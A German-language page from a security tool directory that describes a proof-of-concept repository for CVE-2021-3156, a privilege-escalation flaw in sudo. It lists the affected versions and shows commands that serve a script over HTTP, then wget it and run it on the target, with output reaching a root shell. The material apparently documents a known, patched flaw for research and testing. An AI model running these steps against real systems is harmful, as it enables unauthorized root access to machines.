Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Review.CVE-2021-3156 — CVE-2021-3156-Exploit-Demo | Kitploit
Tools/GitHubGitHub/topskiypavelqwertygang/review.cve-2021-3156
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsRed TeamingBinary-Exploitation
GitHubtopskiypavelqwertygang/review.cve-2021-3156

Review.CVE-2021-3156

CVE-2021-3156-Exploit-Demo

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
43vor 1 JahrNoch nicht geprüft

👑 CVE-2021-3156 (Baron Samedit) — Privilege Escalation via Heap Overflow in sudo

📅 Datum: 2025-06-08
✍️ Autor: @TopskiyPavelQwertyGang 🧠 Security Researcher | Red Team Enthusiast


🧠 CVE Overview

  • CVE-ID: CVE-2021-3156
  • Typ: Heap-based Buffer Overflow
  • Komponente: sudoedit (sudo)
  • Zugriffsebene: Local
  • Ziel: Erlangung von root-Privilegien

🧠 Beschreibung

Heap-Overflow in sudoedit ermöglicht es einem lokalen Benutzer, root-Zugriff zu erlangen, wenn der Befehl sudoedit mit vorbereiteten Parametern ausgeführt wird.

Der Exploit ist aktiv für sudo-Versionen < 1.9.5p2, einschließlich gängiger Ubuntu-/Debian-/CentOS-Images.
Selbst bei aktiviertem ASLR bleibt die Schwachstelle ausnutzbar.


🐾 Ausnutzungsbedingungen

root@kitploit:~
OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31 (tcache ON)
sudo   : 1.8.31 (уязвим)
ASLR   : 2 (включён)

🧪 Umgebungsvorbereitung

  1. Überprüfte Versionen von glibc und sudo:
root@kitploit:~
ldd --version
sudo --version
  1. PoC-Skripte wurden von einem anderen Rechner über einen integrierten HTTP-Server übertragen:
root@kitploit:~
python3 -m http.server 80
  1. Auf dem Zielrechner werden die PoCs heruntergeladen und ausgeführt:
root@kitploit:~
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py

🚀 Erfolgreiche Ausnutzung des Poс

root@kitploit:~
$ python3 exploit_nss.py
# whoami
root

🧾 Fazit

Die Ausnutzung von CVE-2021-3156 bleibt selbst bei aktivem ASLR möglich, wenn glibc ≥ 2.26 und eine anfällige Version von sudo vorliegt.
Am stabilsten erwies sich der Exploit exploit_nss.py, der bei korrekter NSS-Konfiguration beim ersten Mal funktioniert.

🧨 System unter Kontrolle.

Tool herunterladen